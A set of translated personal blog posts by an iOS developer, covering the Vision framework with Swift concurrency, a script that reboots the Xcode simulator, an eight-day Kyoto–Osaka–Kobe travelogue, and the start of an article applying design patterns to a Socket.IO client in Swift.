                        // iOS >=18 new coordinate transformation API toImageCoordinates
                        // Not tested, may still need to calculate the offset for ContentMode = AspectFit:
                        colorLayer.frame = observation.boundingBox.toImageCoordinates(self.baseImageView.frame.size, origin: .upperLeft)
                        colorLayer.backgroundColor = UIColor.red.withAlphaComponent(0.5).cgColor
                        self.baseImageView.layer.addSublayer(colorLayer)
                    }
                    print("BoundingBox: \(observation.boundingBox.cgRect)")
                    print("Payload: \(observation.payloadString ?? "No payload")")
                    print("Symbology: \(observation.symbology)")
                }
            case .recognizeText(_, let textObservation):
                textObservation.forEach { observation in
                    let topCandidate = observation.topCandidates(1).first
                    print(topCandidate?.string ?? "No text recognized")
                }
            default:
                print("Unrecognized result: \(result)")
            }
        }
    }
}
Suppose we have an image wall where each image needs its main subject automatically cropped out as a thumbnail; this is where we can leverage Swift Concurrency to improve loading efficiency.
func generateThumbnail(url: URL) async throws -> UIImage {
    let request = GenerateAttentionBasedSaliencyImageRequest()
    let saliencyObservation = try await request.perform(on: url)
    return cropImage(url, to: saliencyObservation.salientObjects)
}

func generateAllThumbnails() async throws {
    for image in images {
        image.thumbnail = try await generateThumbnail(url: image.url)
    }
}
Executing the requests one at a time like this is slow and inefficient.
func generateAllThumbnails() async throws {
    try await withThrowingDiscardingTaskGroup { taskGroup in
        for image in images {
            // Add each thumbnail generation as a child task so they run concurrently
            taskGroup.addTask {
                image.thumbnail = try await generateThumbnail(url: image.url)
            }
        }
    }
}
Each task is added to the TaskGroup and executed concurrently.
Issue: image recognition and cropping are memory-intensive operations; unrestrained parallel tasks may cause UI lag and OOM crashes.
func generateAllThumbnails() async throws {
    // Use a regular (non-discarding) task group here so we can await each completion below
    try await withThrowingTaskGroup(of: Void.self) { taskGroup in
        // Maximum execution not to exceed 5
        let maxImageTasks = min(5, images.count)
        // Fill in 5 tasks first
        for index in 0..<maxImageTasks {
            taskGroup.addTask {
                images[index].thumbnail = try await generateThumbnail(url: images[index].url)
            }
        }
        var nextIndex = maxImageTasks
        for try await _ in taskGroup {
            // When a task in the taskGroup completes...
            // Check if the index has reached the end
            if nextIndex < images.count {
                let image = images[nextIndex]
                // Continue filling tasks one by one (maintaining at most 5)
                taskGroup.addTask {
                    image.thumbnail = try await generateThumbnail(url: image.url)
                }
                nextIndex += 1
            }
        }
    }
}
To recap the iOS ≥ 18 changes:
• supportedComputeDevices() API
• VN*Request, VN*Observation -> Request, Observation
• Use *Request.perform() directly instead of VNImageRequestHandler.perform([VN*Request]).
👉👉👉 This book club sharing is derived from the weekly technical sharing activities within the KKday App Team. The team is currently enthusiastically recruiting Senior iOS Engineers; interested friends are welcome to submit resumes. 👈👈👈
The Vision Framework API has been redesigned to leverage modern Swift features like concurrency, making it easier and faster to integrate a wide array of Vision algorithms into your app. We’ll tour the updated API and share sample code, along with best practices, to help you get the benefits of this framework with less coding effort. We’ll also demonstrate two new features: image aesthetics and holistic body pose.
-
Feel free to contact me for any questions or feedback.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Temporary workaround to solve XCode Build & Run app black screen issue
Photo by Etienne Girardet
I'm not sure which XCode version introduced this (maybe 14?), but some projects freeze on a black screen after several Build & Run cycles on the simulator. The status stays at "Launching Application…" with no response; rebuilding and running again doesn't help, and the only fix is to manually terminate the entire simulator and restart it.
XCode 14.1: Stuck at “Launching Ap… | Apple Developer Forums Hello team, On Xcode 14.1, After building the project and when the simulator launches, it shows blank black screen… forums.developer.apple.com
New projects or projects with fewer settings hit this issue less often; older projects face it more frequently, but because of their long history and complex settings, online searches turn up no definite root cause, and it is mostly speculated to be an XCode bug (or M1-related?). The issue is very annoying: during frequent Build & Run to check progress, the result is a black screen, and each full restart wastes about 1-2 minutes and disrupts the development flow.
Here is a workaround to navigate around this issue. Since we can’t avoid the black screen problem and it doesn’t occur on the first launch of the simulator during Build & Run, we just need to ensure that each Build & Run is on a freshly restarted simulator.
Find the Device UUID of the simulator you want to run. Run the following command in Terminal:
xcrun simctl list devices
08C43D34-9BF0-42CF-B1B9-1E92838413CC
Create an auto-reboot.sh shell script file:
cd /directory/where/you/want/to/place/this/script/
vi auto-reboot.sh
Paste the following script:
Replace [Device UUID] with the Device UUID of the emulator you want to use.
#!/bin/bash

## Use the command below to find the Device UUID of the simulator you want to use:
## xcrun simctl list devices

# shutdown simulator
xcrun simctl shutdown [Device UUID]

# reboot simulator
xcrun simctl boot [Device UUID]
Press ESC and type :wq! to save and exit. Then adjust the execution permission of auto-reboot.sh:
chmod +x auto-reboot.sh
Since everyone has different preferences for emulators, I set this up in XCode Behaviors. This won't affect project settings or impact team members on git. However, for a simple and team-wide synchronization, you can directly set it in Scheme -> Build -> Pre-actions -> sh /directory/where/you/want/to/place/this/script/auto-reboot.sh.
Open XCode -> Behaviors -> Edit Behaviors…
In the Running section, select the Completes option (Completion Trigger = Stop or Rebuild).
Check Run on the right, choose Script…, and select the location of the newly created auto-reboot.sh file.
We use XCode Behaviors to restart the emulator at the Completes (Stop or Rebuild) trigger point, just before the next Build starts; the restart almost always finishes before Build -> Run completes.
If you rebuild repeatedly in quick succession, there is a chance the restart is slow and you still hit a black screen when running; I don't handle that case here, since the goal is simply to keep everyday Build & Run working normally.
In terms of speed impact, I think it’s acceptable because Build & Run itself takes some time, which is usually enough time for the emulator to restart.
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Record of an 8-day free and easy trip to Kyoto, Osaka, and Kobe in May 2023, including information on food, accommodation, and transportation.
Previously, I have only been to two Southeast Asian countries, Sabah 🇲🇾 in 2019 and Bangkok 🇹🇭 in 2018, both on group tours.
I really like the boundless blue sky and unrestrained freedom in Southeast Asia.
As an enthusiastic and impulsive ENFP who acts on a whim, the time between the proposal and departure of this trip was only two weeks. It all started when my friend Huang Xinping happened to have a career gap, and he, an INFJ complementing my ENFP personality, provided detailed planning while I offered enthusiastic direction. With this perfect harmony, we decided to embark on this journey on a whim.
Since everything was quite spontaneous, and we only planned to visit Universal Studios Osaka, we bought tickets online. However, due to the proximity to the travel date, all special tickets were sold out, and we had to settle for regular entry tickets.
For popular attractions and theme parks in Japan, it’s really necessary to buy tickets in advance Orz. This time, we missed out on baseball tickets, and there were no tickets available on-site, so we could only do a day tour of the venue.
For other attractions, temples, and journeys, we decided on the spot.
It’s essential to have Japanese yen as most temple tickets, souvenirs, amulets, and some trams (if you want a seat) only accept cash.
I exchanged ¥50,000 for this trip and had around ¥15,000 left at the end.
With less than a month before departure, we quickly found a flight on SkyScanner that suited our spontaneous pace:
Taipei <-> Kansai
EVA Air BR 130
13:35 TPE -> KIX 17:15 (actually delayed by over 1 hour, arrived in Japan at 18:40)EVA Air BR 177
11:10 KIX -> TPE 13:05Round trip: $14,915
It seems that since last year, the baggage check-in has changed to a combination of piece and weight system, with one piece per person weighing up to 23kg; additional charges apply for anything extra.
Buying flight tickets with a credit card often includes travel insurance, so it’s recommended to purchase tickets separately for each individual and check the insurance coverage of the credit card, as some debit cards may not have it.
You can also opt for additional travel insurance (medical, inconvenience, loss, accident, etc.) for around $1,500 for an 8-day trip.
I recommend installing The Flight Tracker App to input flight information and track real-time flight details, including terminals, boarding gates, and baggage claim information. (It provides notifications for any changes, but it’s always best to rely on on-site information.)
You can enable iOS Live Activity feature to track in real time a few hours before the plane takes off
I directly bought an 8-day unlimited data SIM card from KKDAY for about $700; there is also an E-SIM version, but I prefer to switch physical SIM cards as I feel more secure.
You can use the Suica ("watermelon") card directly on trains, subways, and buses; it is also accepted at some convenience stores and shops.
For iPhone users, you can add a virtual Suica card by going to "Wallet & Apple Pay" -> "Add Card" -> "Transit Card" -> "Japan" -> "Suica".
Top up with a Mastercard; I failed when trying to top up with a Visa card. It is recommended to top up in Taiwan in advance, otherwise you may find yourself unable to top up or to receive SMS verification codes in Japan, rendering the card unusable.
If you cannot use Suica on iPhone or Android, note that physical Suica cards in Japan are currently out of stock, so you can only purchase the 28-day Welcome Suica limited-time card, which can be topped up and used but becomes invalid after the expiration date, with no refund available.
Apple Watch also supports Suica (not interchangeable with the iPhone card); remember to set it up and top it up in Taiwan beforehand.
When using the iPhone transit card, you do not need to bring up the Apple Pay interface when tapping; just take out your device and tap directly (it will wake the interface automatically).
I mainly used Agoda to find places near train and subway stations.
Toyoko Inn was recommended by friends from Northeast Asia, it is a chain hotel with high value for money and reliable quality, and it includes a Japanese-style breakfast (rice ball or curry rice).
Due to booking late, only Toyoko Inn Shijo Omiya in Kyoto had available rooms; it is about 3 kilometers away from Kyoto Station:
NT$3,844 for 2 persons
Due to late booking, there were limited choices; we chose another chain hotel, APA, which is closer to the station but slightly more expensive; it does not include breakfast but has facilities such as a swimming pool, public baths, etc.
It is about a 15-minute walk from Osaka Umeda Station:
NT$21,459 for 2 persons
No need to apply for a visa, no need to provide COVID vaccine/nucleic acid proof; after booking flights and accommodation, you can fill in the entry information on Visit Japan, and once your phone connects to the internet after landing, you can directly enter the country, if not pre-applied, you will have to fill out a paper form on the spot.
1. Register an account: https://www.vjw.digital.go.jp/main/#/vjwpco001
2. Choose “Register for Entry/Return”
3. Enter flight information for entry
Image for illustration purposes only
Travel Name: Customized for personal use
4. Enter contact information in Japanese
Image for illustration purposes only
I am entering the hotel information for the first day of stay, using Google to find the English version of the hotel address and hotel contact number (does not need to be too accurate, just not too far off, at least the hotel name should be correct).
5. Log in to make a reservation
Image for illustration purposes only
6. Select “Return to Immigration and Customs Procedures” to continue filling out the information
7. Select “Foreigner’s Entry Record”
8. Fill out basic information
The duration of stay includes arrival and departure, totaling 8 days.
Complete the registration in the final step:
9. Select “Return to Immigration and Customs Procedures” again to fill out “Customs Declaration Preparation”
After filling out the basic information, keep selecting “No” until completing the registration:
10. Completion
Steps upon entry:
Scan your passport and this QR code at the self-service customs inspection machine, confirm, and you will have completed the entry process.
Log in to the airline’s website or email for online check-in, and you can directly add the ticket to Apple Pay for complete digitization.
As it is a noon flight, leave in the morning, arrive at the A1 Taipei Main Station of the Airport MRT at 9 o’clock for pre-check-in:
Pre-check-in = Complete check-in + luggage inspection + baggage check at A1 Taipei Main Station (also available at A13 New Taipei Industrial Park); you can go through immigration directly at the airport without queuing at the counter.
If coming from the MRT, remember not to go directly down the escalator to the Airport MRT, as pre-check-in is outside the Airport MRT.
Restrictions:
Service Hours:
Remember to check the airport shuttle official website for direct shuttle schedules before heading out. It’s better to control the actual time to the airport; be sure to take the direct shuttle.
Leaving too early + pre-boarding, there’s still nearly 3 hours after exiting before takeoff.
Airport with few people at noon
Having Lin Dongfang beef noodles while waiting for the flight
Surprisingly, there’s Xingbo Coffee!
Due to a delayed landing, the takeoff was delayed by over an hour.
Not sure if it’s because of pre-boarding, the ground staff announced our names during the waiting time to confirm our presence and boarding.
Bye 🇹🇼
After the plane landed, I switched to a Japanese SIM card and connected to the internet, then logged into Visit Japan Web to complete the immigration and customs procedures.
After clearing customs at Kansai Airport, we directly took the JR Kanku Special Rapid Service HARUKA to Kyoto Station, about 1.5 hours, with only a few stops along the way.
It’s recommended to buy tickets at the ticket machine to ensure you have a seat.
Seeing the iconic Kyoto Tower right after leaving the station
Then took a taxi to the hotel (didn’t take the bus because of luggage, otherwise there would be a bus available); combined with the flight delay, we arrived at the hotel around 9 pm on the first day.
There was a staff member at the hotel reception who spoke Chinese, so I asked her for advice on tomorrow’s itinerary for a smoother experience - very friendly and convenient!
The room was cool, with two single rooms connected by a shared bathroom with a full-length mirror.
Hanamaru Kaiten Sushi Seisakujo Omiya Store
It was late, so after settling in at the hotel, we went out nearby to find something to eat and decided on a skewer restaurant.
Plum Tea Rice
Starting at 80 yen per skewer, fresh, delicious, and cheap! Unexpectedly delightful, but when we wanted to visit again the next day, the shop was closed. QQ
After eating, we went to the convenience store LAWSON to buy some late-night snacks to continue eating at the hotel:
The soy sauce fried noodles were just okay, but they felt heavy to eat.
In the early morning, we packed breakfast downstairs and ate in the room:
Curry rice, a bit too heavy for breakfast, prefer Western or Taiwanese breakfast.
After breakfast, we took a bus to Yasaka Shrine:
We walked to Kiyomizu-dera along the way:
Kyoto’s streets are so clean that even the roadside cement blocks are not dirty.
Yasaka Pagoda
Stopped at a shop halfway for iced matcha and black sugar dumplings:
Arrived at Kiyomizu-dera:
The sun was scorching, and there were many people.
Otowa Waterfall
Lined up to pray for success in academics, love, health, and longevity at the waterfall.
After the visit, we walked back to Yasaka Shrine, casually ate a rice bowl and bought a cup of coffee on the way:
In the afternoon, took a bus to “Kaohsiung”… (just kidding, it’s Kinkaku-ji)
After getting off the bus, it takes about a 15-minute walk to reach Kinkaku-ji:
The bus stop on the way back was crowded, so if you’re agile, like us, you can walk to the next intersection to catch another bus route and avoid the crowd, heading to Kyoto Tower.
Around 5:30 pm, we arrived at the Kyoto Tower observation deck:
You can overlook Kyoto from the tower, and there’s a bar downstairs. We planned to go down to rest and come back up for the night view, but we found out that re-entry was not allowed once we went down, so we gave up.
Here’s a photo of the Kyoto Tower night view taken from outside after we left. (The weather was really nice)
Cute little things
Go to the convenience store and buy some instant noodles for supper at the hotel.
Didn’t have breakfast at the hotel the next day, got up early, checked out, stored luggage, and headed to Arashiyama.
Having McDonald’s breakfast (cheaper than Taiwan by $15)
After eating, walk across the street and take a ride to Arashiyama
Shijo Omiya is the starting station, take it directly to the final station Arashiyama, very convenient and always have seats.
Arrival:
First, walk towards Arashiyama after arrival:
You can experience taking a boat to see the river view (similar to Bitan in Taiwan?)
For those with good physical strength, you can choose a small hike:
We went hiking to see monkeys and the panoramic view. It takes about 30-45 minutes from the bottom of the mountain to the top, not difficult to walk.
There are really monkeys
After descending, on the way back, we had lunch with tempura soba noodles:
Ordered wrong; shouldn't have added the tempura rice as well, and it turned into a soba-noodles-plus-tempura-rice-bowl trap.
After eating, head in another direction towards “Tenryu-ji Temple”:
Come out from the back door of Tenryu-ji Temple and go directly to the bamboo forest:
There are really a lot of people, find a good angle for photos 🥵
It’s also beautiful to take photos from bottom to top.
Having ice cream after descending, getting ready to head back
Bought local sake as a souvenir
Return to Shijo Omiya to the hotel to pick up luggage and prepare to go to Osaka:
The hotel is right outside Hankyu Omiya Station
When I first came here on the first day, I felt a bit inconvenient because it was a distance from Kyoto Station; but later I found it was actually great; it’s the central point of Kinkaku-ji and Kiyomizu-dera, there is a direct tram to Arashiyama when you come out, and it’s also direct to Osaka (remember about an hour).
When first arriving in Osaka, it’s easy to get lost, there are many exits, Osaka and Umeda are actually the same location.
The hotel rooftop has a free outdoor swimming pool, a convenience store inside the hotel, and a free public bath.
After dropping off the luggage, go out to find food:
There is a bear in the amusement park that makes fun of itself!!
Following the instructions on Google Maps, take the train and then walk to Osaka Castle. The walking part from the station to the moat and then to the main castle takes about 30 minutes, a bit of a distance.
The line at the ticket counter is very long, you can purchase tickets online here to enter without waiting.
View of Osaka from the top:
There is a history of the Warring States on each floor inside:
After leaving Osaka Castle, we walked around nearby and looked for food.
Then we went to the outskirts of Tsuruhashi to buy some things at small shops.
We walked around Tsuruhashi, which seems to be a non-touristy area with few tourists; quite a few Korean peripheral shops, more like a Korean town for Japanese people.
Just came to find some Korean cultural and creative items, later found out that Taiwan also sells them -_-
After walking around Osaka for a long time, my feet couldn’t take it anymore; fortunately, on the way back, we stopped by Nintendo when returning to Osaka Umeda Station.
Osaka Nintendo is located upstairs at Daimaru Department Store next to the station.
Went crazy buying The Legend of Zelda merchandise:
Everything is of high quality, the badges are made of metal, and the workmanship is very delicate.
Didn’t buy the Express Pass, didn’t go to Super Mario World early in the morning to queue up; we took a relaxed and casual approach and entered the park after 10 a.m.
There were a lot of people entering the park, so we quickly checked the Super Mario World tickets on the app; luckily, the expert Huang Xinping won the 5 p.m. entry qualification for Super Mario World.
First, we went to the Harry Potter themed area:
Butterbeer
We queued to buy Butterbeer (non-alcoholic, very sweet); felt that if we really wanted to collect it, we should buy the most expensive glass.
Next stop, Jurassic Park:
We queued for the rides, about 45 minutes wait; sat in the front row.
Similar to a volcano adventure, it will rush down at the end 🥵 (I’m afraid of the feeling of weightlessness).
But fortunately, I still had fun. Later, I saw the news that this facility will be reorganized starting in June and will probably be closed for a few years.
The scenery inside is very realistic, you would think you are in the 🇺🇸 without saying it.
Yoshi!!
Unexpectedly fun at the beginning, the melody is still in my mind today!
There will be floats (Mario, Pokémon, Sesame Street… characters) and dancers leading the parade, stopping at each section to get everyone to dance together! All staff, including those maintaining order, will also dance together, creating a strong sense of involvement!
East and west sway, around five o’clock head to Super Mario World.
I have to admire the scene design, completely bringing the game world to reality, like stepping into a paradise!
As it was close to closing time, I didn’t buy a watch to play interactive scenes, just went to queue for Yoshi’s facility.
Every detail is done very delicately!
Before closing, I took some night views of Universal Studios, many crowded places became great for photography.
Especially in the Harry Potter themed area, the scenes originally crowded with wand interactions were empty before closing, saw a sister playing alone and enjoying every interactive scene XD
Finally took a picture of the globe, goodbye Universal.
At night, had izakaya dinner, bought Nissin instant noodles as a midnight snack (after eating back and forth, this is still the best).
Early in the morning, took a train to Kobe.
First went to explore Kobe shopping street.
Tried the famous Kobe beef croquette.
Walked from the shopping street to Kobe Port.
Realized Kobe Tower was under maintenance QQ
Completion time details uncertain
On the way back, strolled through the streets of Kobe.
Found a cafe in Kobe to take a break:
Strawberry chocolate milkshake, tasty but very sweet.
From Kobe to Dotonbori
Had dinner at the famous Osaka Shinsekai Kushikatsu Ittoku.
After eating, started the tourist itinerary, took photos of landmarks, and went to a drugstore to shop.
Glico
Back to Taiwan and only realized I took the wrong photo after checking IG XD. There are better photo spots when entering from the nearby department store.
Back to the hotel to continue eating instant noodles and drinking sake as supper.
No impression of the taste
[KKday Osaka Sightseeing Pass (Osaka e-Pass)](https://www.kkday.com/zh-tw/product/114351-osaka-sightseeing-pass-osaka-e-pass-japan?cid=19365&ud1=76d66c2e34af)
Last day countdown to return to Taiwan, a sightseeing itinerary.
Decided impulsively in the early morning to go to Koshien to watch the Hanshin Tigers baseball game, took the subway to Koshien Station.
The Koshien Baseball Stadium is right outside the station.
But we were out of luck, unlike in Taiwan where there are always seats at baseball games, all Hanshin games were sold out until July; you have to buy tickets early, otherwise, you can only do a day trip outside the stadium.
Finally, we had something to eat nearby, bought some Hanshin Tigers souvenirs, and went to Cafe de L’ambre for a coffee before leaving.
I always thought it was called “Coffee Place”
Hanshin Tigers sticker
After leaving Koshien, we went to Namba for shopping.
Also had some takoyaki and crab legs by the roadside.
Perhaps we went to the wrong store, felt quite ordinary.
Walked back to Dotonbori and headed to the original Don Quijote store.
Only the original store has a Ferris wheel
After shopping, we returned to Osaka in the evening and found an izakaya near our accommodation for our final dinner.
Took one last look at the Osaka night view.
The flight was at noon, so we checked out at 7 am to head to Kansai Airport.
The weather in Osaka changed today, it started to rain, fitting for the farewell mood.
Took a final photo of the Osaka skyline as a farewell.
Originally planned to take the train to Kansai Airport, but dragging luggage up and down; the day before, I specifically explored the bus route back (including time and station location). Went to the bus station early in the morning to check the crowd, luckily there weren’t many people in line, so we bought bus tickets to Kansai Airport and comfortably took the bus directly to Kansai Airport.
Finally found the troubleshooting counter, we completed the online check-in with just a click and could go directly to the luggage check-in counter! Saved almost an hour.
Actually, I really want to tell the people queuing, if you open the webpage now and click to receive the e-ticket, you can go to check in your luggage and then go through immigration.
After going through immigration, there weren’t many food options or stores under renovation at Kansai Airport, so I ended up buying a tonkatsu curry toast from New World.
Waiting to board the flight back to Taiwan.
Safely arrived in Taiwan in the afternoon, time to rest at home! 🇹🇼
Didn’t buy much actually, just bought whatever caught my eye; after comparing, I found that the drugstore coming out of Kyoto Station was the cheapest (about $100-$300 yen cheaper than Osaka), with Don Quijote being the most expensive.
The theme song of Yodobashi is really catchy, got brainwashed right after strolling in Kyoto.
The duty-free shopping rule in Japan requires a minimum of ¥5,000 to be eligible for tax exemption with your passport. They seal the items in a plastic bag, which you can only open upon returning home (the photos were taken at home; if you open it within the country and get checked upon exiting, you may have to pay taxes, but it didn’t seem like they were checking; remember to note that liquids can only be checked in, if there are liquids inside the sealed items, they must be checked in as a whole).
Apart from famous snacks, I mostly looked for local products from century-old shops, can’t guarantee they’re delicious but they’re guaranteed to be century-old; the recommended snacks by everyone are guaranteed to be delicious, but be prepared to queue + they’re not century-old XD
In the end, it’s best to find delicious food!
Fell in love with Japan on my first visit, already planning my next trip back.
Actually, I went to Tokyo again from 6/7-11 😝 Stay tuned for the next episode of my travelogue
Overall, convenient transportation, peaceful, pleasant weather (in May, it feels like autumn in Taiwan, cool at night), people have boundaries and are polite; really loved it!
In terms of expenses, considering the current exchange rate and prices, it’s actually cheaper than Taiwan…
Peak Steps 5/23-5/28
Not to criticize anyone, but at Universal Studios we encountered a group from Taiwan (they had 🇹🇼 on their bags), apparently employees of a direct-sales company, loudly shouting slogans and repeatedly filming "super awesome, performance is awesome" in the middle of the road and blocking the way; it was embarrassing.
In my opinion, if you want to enter the Japanese market, relying solely on advertising and marketing might be challenging, at most attracting some curious individuals; Japan has a strong cultural unity, so you need to find a way to integrate into their lives and habits to have a chance at winning their hearts.
In addition, the fault tolerance is very low, for example, bugs, unexpected appearance of other languages; for us, it may be okay once or twice, or at least not happening frequently; for them, I think it could be a disaster with just one occurrence because this thing is not rigorous enough and does not value them.
Successful Kansai Trip!
If you have any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Record of problem scenarios encountered and solutions applied when encapsulating Socket.IO Client Library requirements using Design Patterns
Photo by Daniel McCullough
This article is a record of real-world development requirements, where Design Patterns were applied to solve problems. The content will cover the background of the requirements, the actual problem scenarios encountered (What?), why Design Patterns were applied to solve the problems (Why?), and how they were implemented (How?). It is recommended to read from the beginning for coherence.
This article will introduce four scenarios encountered in developing this requirement and the application of seven Design Patterns to solve these scenarios.
This year, the company split into Feature Teams (multiple) and Platform Team; the former mainly focuses on user-side requirements, while the Platform Team deals with internal members of the company. One of their tasks is to introduce technology, build infrastructure, and ensure systematic integration to pave the way for Feature Teams when developing requirements.
The Feature Teams needed to change the original messaging feature (fetching message data by calling APIs on the page, requiring a refresh for the latest messages) to real-time communication (receiving the latest messages instantly, and sending messages).
The Platform Team’s focus was not only on the immediate real-time communication requirement but also on long-term development and reusability. After evaluation, it was deemed essential to have a WebSocket bidirectional communication mechanism in modern apps. Apart from the current requirement, there will be many future opportunities to use this mechanism. With the available resources, efforts were put into designing and developing the interface.
Goals:
Time and Resources:
This Feature will be supported on Web, iOS, and Android platforms. WebSocket bidirectional communication protocol will be introduced for implementation, with the backend expected to directly use Socket.io service.
Firstly, Socket != WebSocket
For more information on Socket and WebSocket and technical details, refer to the following two articles:
In short:
Socket is an abstract encapsulation interface for the TCP/UDP transport layer, while WebSocket is a transmission protocol at the application layer.
The relationship between Socket and WebSocket is like that of a dog and a hot dog; they are unrelated.
Socket.IO is a layer of abstract operation encapsulation for Engine.IO, which encapsulates the use of WebSocket. Each layer is only responsible for communication between the upper and lower layers and does not allow operations to pass through (e.g. Socket.IO directly operating WebSocket connections).
In addition to basic WebSocket connections, Socket.IO/Engine.IO also implements many convenient and useful feature sets (e.g. offline event sending mechanism, similar to HTTP request mechanism, room/group mechanism, etc.).
The main responsibility of the Platform Team is to bridge the logic between Socket.IO and Pinkoi Server Side for use by the upper Feature Teams during development.
The server side needs to set {allowEIO3: true}, or the client side must specify the matching version via the .version config option; otherwise it won't connect.
It is recommended to experiment with the mechanisms you want to use before adopting Socket.IO.
Socket.IO Swift Client is based on Starscream WebSocket Library, and can be downgraded to use Starscream if necessary.
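For reference, a minimal connection sketch with the socket.io-client-swift library, pinning the client to the server's Socket.IO protocol version via the .version option; the URL is a placeholder, and whether .two or .three is needed depends on your server and library version:

import Foundation
import SocketIO

// Pin the client to the server's Socket.IO protocol version so the handshake succeeds.
let manager = SocketManager(socketURL: URL(string: "wss://example.com")!,
                            config: [.log(true), .version(.two)])
let socket = manager.defaultSocket

socket.on(clientEvent: .connect) { _, _ in
    print("socket connected")
}
socket.connect()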
Background information supplement ends here; let's move on to the main topic.
Design patterns are simply solutions to common problems in software design. You don’t necessarily have to use design patterns to develop; design patterns may not be applicable to all scenarios, and there’s no rule against deriving new design patterns on your own.
The Catalog of Design Patterns
However, existing design patterns (The 23 Gang of Four Design Patterns) are common knowledge in software design. Just mentioning an XXX Pattern will trigger a corresponding mental blueprint in everyone’s mind, without the need for much explanation. It is easier to understand the context for future maintenance, and these methods have been validated by the industry, so there’s no need to spend time examining object dependency issues. Choosing the right pattern for the right scenario can reduce communication and maintenance costs, and improve development efficiency.
Design patterns can be combined, but it is not recommended to modify existing design patterns, forcibly apply patterns that do not fit, or apply patterns that do not belong to the category (e.g. using the Chain of Responsibility pattern to create objects), as it may lose its meaning and potentially cause misunderstandings for future maintainers.
This article focuses on the application of Design Patterns, not the operation of Socket.IO. Some examples may be simplified for descriptive purposes and may not be applicable to real Socket.IO encapsulation.
Due to space limitations, this article will not provide detailed introductions to the architecture of each design pattern. Please click on the links for each pattern to understand its architecture before continuing to read.
Demo Code will be written in Swift.
Real-world usage:
• ConnectionManager exists as a single object in the App Lifecycle and is used to manage Connection operations.
• ConnectionPool is a shared pool of Connections; Connections are retrieved from this pool, and an existing Connection is reused when the URL path matches.
• ConnectionHandler acts as the external operator and state manager for a Connection.
• ConnectionFactory works with the Flyweight Pattern: when no reusable Connection is found in the pool, this factory interface is used to create one.
import Combine
import Foundation

protocol Connection {
    var url: URL { get }
    var id: UUID { get }

    init(url: URL)

    func connect()
    func disconnect()

    func sendEvent(_ event: String)
    func onEvent(_ event: String) -> AnyPublisher<Data?, Never>
}

protocol ConnectionFactory {
    func create(url: URL) -> Connection
}

class ConnectionPool {

    private let connectionFactory: ConnectionFactory
    private var connections: [Connection] = []

    init(connectionFactory: ConnectionFactory) {
        self.connectionFactory = connectionFactory
    }

    func getOrCreateConnection(url: URL) -> Connection {
        if let connection = connections.first(where: { $0.url == url }) {
            return connection
        } else {
            let connection = connectionFactory.create(url: url)
            connections.append(connection)
            return connection
        }
    }

}

class ConnectionHandler {
    private let connection: Connection
    init(connection: Connection) {
        self.connection = connection
    }

    func getConnectionUUID() -> UUID {
        return connection.id
    }
}

class ConnectionManager {
    static let shared = ConnectionManager(connectionPool: ConnectionPool(connectionFactory: SIOConnectionFactory()))
    private let connectionPool: ConnectionPool
    private init(connectionPool: ConnectionPool) {
        self.connectionPool = connectionPool
    }

    //
    func requestConnectionHandler(url: URL) -> ConnectionHandler {
        let connection = connectionPool.getOrCreateConnection(url: url)
        return ConnectionHandler(connection: connection)
    }
}

// Socket.IO Implementation
class SIOConnection: Connection {
    let url: URL
    let id: UUID = UUID()

    required init(url: URL) {
        self.url = url
        //
    }

    func connect() {
        //
    }

    func disconnect() {
        //
    }

    func sendEvent(_ event: String) {
        //
    }

    func onEvent(_ event: String) -> AnyPublisher<Data?, Never> {
        //
        return PassthroughSubject<Data?, Never>().eraseToAnyPublisher()
    }
}

class SIOConnectionFactory: ConnectionFactory {
    func create(url: URL) -> Connection {
        //
        return SIOConnection(url: url)
    }
}
//

print(ConnectionManager.shared.requestConnectionHandler(url: URL(string: "wss://pinkoi.com/1")!).getConnectionUUID().uuidString)
print(ConnectionManager.shared.requestConnectionHandler(url: URL(string: "wss://pinkoi.com/1")!).getConnectionUUID().uuidString)

print(ConnectionManager.shared.requestConnectionHandler(url: URL(string: "wss://pinkoi.com/2")!).getConnectionUUID().uuidString)

// output:
// D99F5429-1C6D-4EB5-A56E-9373D6F37307
// D99F5429-1C6D-4EB5-A56E-9373D6F37307
// 599CF16F-3D7C-49CF-817B-5A57C119FE31
As mentioned in the background technical details, the Send Event of the Socket.IO Swift Client does not support offline sending (but the Web/Android versions of the library do), so iOS needs to implement this feature on its own.
Interestingly, the Socket.IO Swift Client's onEvent does support offline subscription.
SIOManager is the lowest-level encapsulation for communicating with Socket.IO; its send and request methods wrap the Socket.IO Send Event operations. When the Socket.IO connection is found to be disconnected, the request parameters are placed into bufferedCommands, and once connected they are processed one by one (first in, first out).
protocol BufferedCommand {
    var sioManager: SIOManagerSpec? { get set }
    var event: String { get }

    func execute()
}

struct SendBufferedCommand: BufferedCommand {
    let event: String
    weak var sioManager: SIOManagerSpec?

    func execute() {
        sioManager?.send(event)
    }
}

struct RequestBufferedCommand: BufferedCommand {
    let event: String
    let callback: (Data?) -> Void
    weak var sioManager: SIOManagerSpec?

    func execute() {
        sioManager?.request(event, callback: callback)
    }
}

protocol SIOManagerSpec: AnyObject {
    func connect()
    func disconnect()
    func onEvent(event: String, callback: @escaping (Data?) -> Void)
    func send(_ event: String)
    func request(_ event: String, callback: @escaping (Data?) -> Void)
}

enum ConnectionState {
    case created
    case connected
    case disconnected
    case reconnecting
    case released
}

class SIOManager: SIOManagerSpec {

    var state: ConnectionState = .disconnected {
        didSet {
            if state == .connected {
                executeBufferedCommands()
            }
        }
    }

    private var bufferedCommands: [BufferedCommand] = []

    func connect() {
        state = .connected
    }

    func disconnect() {
        state = .disconnected
    }

    func send(_ event: String) {
        guard state == .connected else {
            appendBufferedCommands(connectionCommand: SendBufferedCommand(event: event, sioManager: self))
            return
        }

        print("Send:\(event)")
    }

    func request(_ event: String, callback: @escaping (Data?) -> Void) {
        guard state == .connected else {
            appendBufferedCommands(connectionCommand: RequestBufferedCommand(event: event, callback: callback, sioManager: self))
            return
        }

        print("request:\(event)")
    }

    func onEvent(event: String, callback: @escaping (Data?) -> Void) {
        //
    }

    func appendBufferedCommands(connectionCommand: BufferedCommand) {
        bufferedCommands.append(connectionCommand)
    }

    func executeBufferedCommands() {
        // First in, first out
        bufferedCommands.forEach { connectionCommand in
            connectionCommand.execute()
        }
        bufferedCommands.removeAll()
    }

    func removeAllBufferedCommands() {
        bufferedCommands.removeAll()
    }
}

let manager = SIOManager()
manager.send("send_event_1")
manager.send("send_event_2")
